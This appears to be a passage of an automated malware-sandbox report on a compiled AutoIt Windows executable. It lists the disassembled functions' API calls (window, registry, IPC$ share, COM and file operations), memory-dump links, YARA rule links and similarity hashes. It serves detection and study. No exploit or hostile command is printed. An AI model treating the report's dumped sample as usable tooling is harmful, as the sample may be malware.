                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,003C2036,?,00000000,?,?,?,?,003C16CB,00000000,?), ref: 003C1B9A
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003C20D3
                                                    • KillTimer.USER32(-00000001,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003C216E
                                                    • DestroyAcceleratorTable.USER32 ref: 003FBEF6
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBF27
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBF3E
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003C16CB,00000000,?,?,003C1AE2,?,?), ref: 003FBF5A
                                                    • DeleteObject.GDI32(00000000), ref: 003FBF6C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    • Opcode ID: de603d86e3513c1ac6c9f2829e1146a21efdfa69abcebb02828690a548e47e95
                                                    • Instruction ID: 0176a11737b5c336dfba27f219c3bcc42188a81bcab5bbb086e7f68f4fa234a4
                                                    • Opcode Fuzzy Hash: de603d86e3513c1ac6c9f2829e1146a21efdfa69abcebb02828690a548e47e95
                                                    • Instruction Fuzzy Hash: F6617835101714DFCB26AF18DD48B2AB7F1FB41316F16883EE1428A960C775AC95DF98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C21A5, Relevance: 18.1, APIs: 12, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C25DB: GetWindowLongW.USER32(?,000000EB), ref: 003C25EC
                                                    • GetSysColor.USER32(0000000F), ref: 003C21D3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: b8f6c65c64a35d06a280489f92562e71346107ebf234f6cc33d684b1e200af13
                                                    • Instruction ID: 0ea0870a811a1edddbbdb0b69f918e516a716030bd12e24627504937cd0ceaca
                                                    • Opcode Fuzzy Hash: b8f6c65c64a35d06a280489f92562e71346107ebf234f6cc33d684b1e200af13
                                                    • Instruction Fuzzy Hash: 9741A035100148AEDB629F68EC48FBA3B69EB07331F154679FE65CA1E2C7319C42DB25
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041AA64, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                    • String ID: %s%u
                                                    • API String ID: 1412819556-679674701
                                                    • Opcode ID: 671417ccefcd845a7825f47cb8ab3e7b8e9abfbaec9daa3f38cf112ff2623a38
                                                    • Instruction ID: 511f732994084c9eb7324a28363061bb9fe7c6af9881a5e828e46c8643917eef
                                                    • Opcode Fuzzy Hash: 671417ccefcd845a7825f47cb8ab3e7b8e9abfbaec9daa3f38cf112ff2623a38
                                                    • Instruction Fuzzy Hash: 16A10171205756AFD715DF20C884BEBB7E9FF04305F00462AF999C2290DB38E9A5CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041B397, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper
                                                    • String ID: @$ThumbnailClass
                                                    • API String ID: 3725905772-1539354611
                                                    • Opcode ID: a9b60a930ba063f4af8b5bc6ddf2b5e0fa8277fc0011fa42c6104fa42c51ad29
                                                    • Instruction ID: 84c1b77de85cb5ef8f3858658bbf3f4d475b3ce5becedee00c900e51b1b269f9
                                                    • Opcode Fuzzy Hash: a9b60a930ba063f4af8b5bc6ddf2b5e0fa8277fc0011fa42c6104fa42c51ad29
                                                    • Instruction Fuzzy Hash: 868190710043059BDB05DF11C985FEB7BE8EF54318F04856AFD898A2A2DB38DD89CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044C27C, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 153windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                      • Part of subcall function 003C2344: GetCursorPos.USER32(?,?,004867B0,?,004867B0,004867B0,?,0044C247,00000000,00000001,?,?,?,003FBC4F,?,?), ref: 003C2357
                                                      • Part of subcall function 003C2344: ScreenToClient.USER32 ref: 003C2374
                                                      • Part of subcall function 003C2344: GetAsyncKeyState.USER32(00000001), ref: 003C2399
                                                      • Part of subcall function 003C2344: GetAsyncKeyState.USER32(00000002), ref: 003C23A7
                                                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0044C2E4
                                                    • ImageList_EndDrag.COMCTL32 ref: 0044C2EA
                                                    • ReleaseCapture.USER32 ref: 0044C2F0
                                                    • SetWindowTextW.USER32(?,00000000), ref: 0044C39A
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0044C3AD
                                                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0044C48F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$prH$prH
                                                    • API String ID: 1924731296-3737415381
                                                    • Opcode ID: 9ffd956b384fbb88ad94e0f3144c05c7408e84acfa36198f458917a08f126096
                                                    • Instruction ID: b4e7a8d7b9e0cc7260983cd629f68e70688dd0066dbbdd350a726d8fc35f4ee2
                                                    • Opcode Fuzzy Hash: 9ffd956b384fbb88ad94e0f3144c05c7408e84acfa36198f458917a08f126096
                                                    • Instruction Fuzzy Hash: 7B519C74204304AFE700EF20CC96F6E7BE4EB88314F14892EF5958B2E1CB75A958CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041FDBA, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 142windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,?,00000000,00000001,?,003FE452,?,0000138C,?,00000001,?,?,?,00000001), ref: 0041FDEF
                                                    • LoadStringW.USER32(00000000,?,003FE452,?), ref: 0041FDF8
                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,003FE452,?,0000138C,?,00000001,?,?,?,00000001,?), ref: 0041FE1A
                                                    • LoadStringW.USER32(00000000,?,003FE452,?), ref: 0041FE1D
                                                    • MessageBoxW.USER32(00000000,00000004,?,00011010), ref: 0041FF3E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 4072794657-2268648507
                                                    • Opcode ID: e4e9b8de09828a077c798f1ba00ca23e60d248b21d0528b8e744ad6ca3ba72a8
                                                    • Instruction ID: b92987dd25c687dd3114088bedab92047d90f12c59e43bd48a24fdae5ace7c47
                                                    • Opcode Fuzzy Hash: e4e9b8de09828a077c798f1ba00ca23e60d248b21d0528b8e744ad6ca3ba72a8
                                                    • Instruction Fuzzy Hash: 45414E72804219AACB16FBE0DD86EEE773CAF15300F50016AF505BA092DB756F4ACF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00417D24, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136registryshareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WNetAddConnection2W.MPR(?,?,00000001,?), ref: 00417DE8
                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00417E04
                                                    • RegOpenKeyExW.ADVAPI32(?,?,?,00020019,?), ref: 00417E20
                                                    • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00000001), ref: 00417E4A
                                                    • CLSIDFromString.OLE32(?,?), ref: 00417E72
                                                    • RegCloseKey.ADVAPI32(?), ref: 00417E7D
                                                    • RegCloseKey.ADVAPI32(?), ref: 00417E82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 3030280669-22481851
                                                    • Opcode ID: c1524b87095c610dc5782e6cdc35ee7eb05b2f7ef94c782d677b740bdeb23586
                                                    • Instruction ID: 96ead91ee00cc5346bea2acb6b680d7410b48d92274877dd1f514639caa89d33
                                                    • Opcode Fuzzy Hash: c1524b87095c610dc5782e6cdc35ee7eb05b2f7ef94c782d677b740bdeb23586
                                                    • Instruction Fuzzy Hash: 97410A7681422CAEDF12EBA4EC85DFEB778FF18750B04406AF805A6161DB355E45CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042A45A, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 105fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0042A47A
                                                    • CreateDirectoryW.KERNEL32(?), ref: 0042A4D9
                                                    • CreateFileW.KERNEL32(?,40000000,?,?,00000003,02200000), ref: 0042A4FE
                                                    • DeviceIoControl.KERNEL32 ref: 0042A58E
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000003,02200000), ref: 0042A599
                                                    • RemoveDirectoryW.KERNEL32(?,?,?,00000003,02200000), ref: 0042A5A2
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000003,02200000), ref: 0042A5AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 3827137101-3457252023
                                                    • Opcode ID: 038f851cda583ed20d52a374d90f2bd08d37fab172547e1dd2685671640adad9
                                                    • Instruction ID: 81fe449293507c7876577fead9c710cc3e072979614274d3519873739323d455
                                                    • Opcode Fuzzy Hash: 038f851cda583ed20d52a374d90f2bd08d37fab172547e1dd2685671640adad9
                                                    • Instruction Fuzzy Hash: 4B31C076600119BBDB219FA0EC49FFB777CEF89301F1041B6FA08D6151EA7497588B29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044772A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 104windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004477CD
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 004477D4
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004477E7
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004477EF
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 004477FA
                                                    • DeleteDC.GDI32(00000000), ref: 00447803
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0044780D
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001,?,?,?,?,003FCCE5,?,?,?,?,?,?,?), ref: 00447821
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0044782D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: 3ab91ef50da6a7622cdf2e4753cde6aa9b56efa7897f166b7b39539bec9b0b70
                                                    • Instruction ID: 048e9daaf9dcbe6929adfdedd3f18ee8be94fbfa08b55a28289174b2467cff57
                                                    • Opcode Fuzzy Hash: 3ab91ef50da6a7622cdf2e4753cde6aa9b56efa7897f166b7b39539bec9b0b70
                                                    • Instruction Fuzzy Hash: 35317075105114BFEF119FA4DC48FEB3F69FF0A325F110226FA15A51A0C7359816DBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042D7F8, Relevance: 16.8, APIs: 11, Instructions: 283comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 0042D855
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0042D8E8
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 0042D8FC
                                                    • CoCreateInstance.OLE32(00452D7C,00000000,00000001,0047A89C,?), ref: 0042D948
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0042D9B7
                                                    • CoTaskMemFree.OLE32(?,?), ref: 0042DA0F
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0042DA88
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0042DAAB
                                                    • CoTaskMemFree.OLE32(00000000), ref: 0042DAB2
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0042DAE9
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 0042DAEB
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                    • String ID:
                                                    • API String ID: 2762341140-0
                                                    • Opcode ID: 8aea69068d5438452543086323a6a43928127bdb736ae04b474dad8aabb0709c
                                                    • Instruction ID: b4156b2f9b20499d3e00a2d18c68062677779740606b5d782628ccfd451626c8
                                                    • Opcode Fuzzy Hash: 8aea69068d5438452543086323a6a43928127bdb736ae04b474dad8aabb0709c
                                                    • Instruction Fuzzy Hash: 35B12F75A00118AFDB04DFA4D888EAEBBF9FF49304B1584A9F809EB251DB34ED45CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043762D, Relevance: 16.7, APIs: 11, Instructions: 168windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 004376A2
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004376AE
                                                    • CreateCompatibleDC.GDI32(00000006), ref: 004376BA
                                                    • SelectObject.GDI32(00000000,00000006), ref: 004376C7
                                                    • StretchBlt.GDI32(?,00000000,00000000,00000007,?,00000006,?,?,00000007,?,00CC0020), ref: 0043771B
                                                    • GetDIBits.GDI32(?,00000006,?,?,?,00000028), ref: 00437757
                                                    • GetDIBits.GDI32(?,00000006,00000000,?,00000000,00000028,00000000), ref: 0043777B
                                                    • SelectObject.GDI32(?,?), ref: 00437783
                                                    • DeleteObject.GDI32(00000006), ref: 0043778C
                                                    • DeleteDC.GDI32(?), ref: 00437793
                                                    • ReleaseDC.USER32 ref: 0043779E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID:
                                                    • API String ID: 2598888154-0
                                                    • Opcode ID: 9b72b70f9bd966ea0b8a388189045bda1d33cc50c6040c09fa5fa3ba556bf0d2
                                                    • Instruction ID: a217780bc818d9fd79d65492d9f6658a648c26d103fd5c138d593eafc126fd47
                                                    • Opcode Fuzzy Hash: 9b72b70f9bd966ea0b8a388189045bda1d33cc50c6040c09fa5fa3ba556bf0d2
                                                    • Instruction Fuzzy Hash: F65180B5904209EFDB25CFA8DC85EAFBBB8EF49310F10842EF58997210C735A844CB64
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041710E, Relevance: 16.6, APIs: 11, Instructions: 130memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,00000000), ref: 00417135
                                                    • SafeArrayAllocData.OLEAUT32(00000000), ref: 0041718E
                                                    • VariantInit.OLEAUT32(?), ref: 004171A0
                                                    • SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 004171C0
                                                    • VariantCopy.OLEAUT32(00000000,?), ref: 00417213
                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00417227
                                                    • VariantClear.OLEAUT32(?), ref: 0041723C
                                                    • SafeArrayDestroyData.OLEAUT32(00000000), ref: 00417249
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(00000000), ref: 00417252
                                                    • VariantClear.OLEAUT32(?), ref: 00417264
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(00000000), ref: 0041726F
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: f6787e24e508cbba63f9f362e9282ebbf8a16ce6041986fcca8a8a049df4a363
                                                    • Instruction ID: 880644d1694037a8d87a6705a355513dae79aef9d3e843353f5a89213190eb36
                                                    • Opcode Fuzzy Hash: f6787e24e508cbba63f9f362e9282ebbf8a16ce6041986fcca8a8a049df4a363
                                                    • Instruction Fuzzy Hash: BB413A35900119AFCB00DFA4DC48DEEBBB8FF19354B11847AF555A7261CB34A98ACBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C6BEC, Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 494COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003E0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,003C6C6C,?,00008000), ref: 003E0BB7
                                                      • Part of subcall function 003C48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003C48A1,?,?,003C37C0,?,00000000,00000001), ref: 003C48CE
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 003C6D0D
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 003C6E5A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 1801377286-1018226102
                                                    • Opcode ID: 07631b53d2be8c253babf9aaccb887957e97bc131c13cb6ecd236cbe95a8ead6
                                                    • Instruction ID: dbd200036a3dfac093ca3f58b19ce5716b83fa5a1ce7eb1f69bb03cc6f75ba3f
                                                    • Opcode Fuzzy Hash: 07631b53d2be8c253babf9aaccb887957e97bc131c13cb6ecd236cbe95a8ead6
                                                    • Instruction Fuzzy Hash: 5A027B311083459FC726EF25C881EAFBBE4AF95354F10491EF5859B2A1DB30ED89CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004386D0, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32 ref: 00438718
                                                    • CoUninitialize.OLE32 ref: 00438723
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00452BEC,?), ref: 00438783
                                                    • IIDFromString.OLE32(?,?), ref: 004387F6
                                                    • VariantInit.OLEAUT32(?), ref: 00438890
                                                    • VariantClear.OLEAUT32(?), ref: 004388F1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 636576611-1287834457
                                                    • Opcode ID: 2af341db6b5265d97b3828392d3117ea78c6c498cc0e1dfb1069147014994804
                                                    • Instruction ID: 51ed2a4a524656e2d5ead44915d7c95fa7ce03125ffa05136a3cd2c8e5cbcb6e
                                                    • Opcode Fuzzy Hash: 2af341db6b5265d97b3828392d3117ea78c6c498cc0e1dfb1069147014994804
                                                    • Instruction Fuzzy Hash: B961BE706083019FD715EF24C848B5BFBE8AF89714F10481EF9859B291CB78ED49CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004246D6, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?,?,?,?,?,0042CD8C), ref: 004246E8
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?,?,?,?,?,0042CD8C), ref: 0042470E
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?,?,?,?,?,0042CD8C), ref: 00424784
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FileInfoVersion$QuerySizeValue
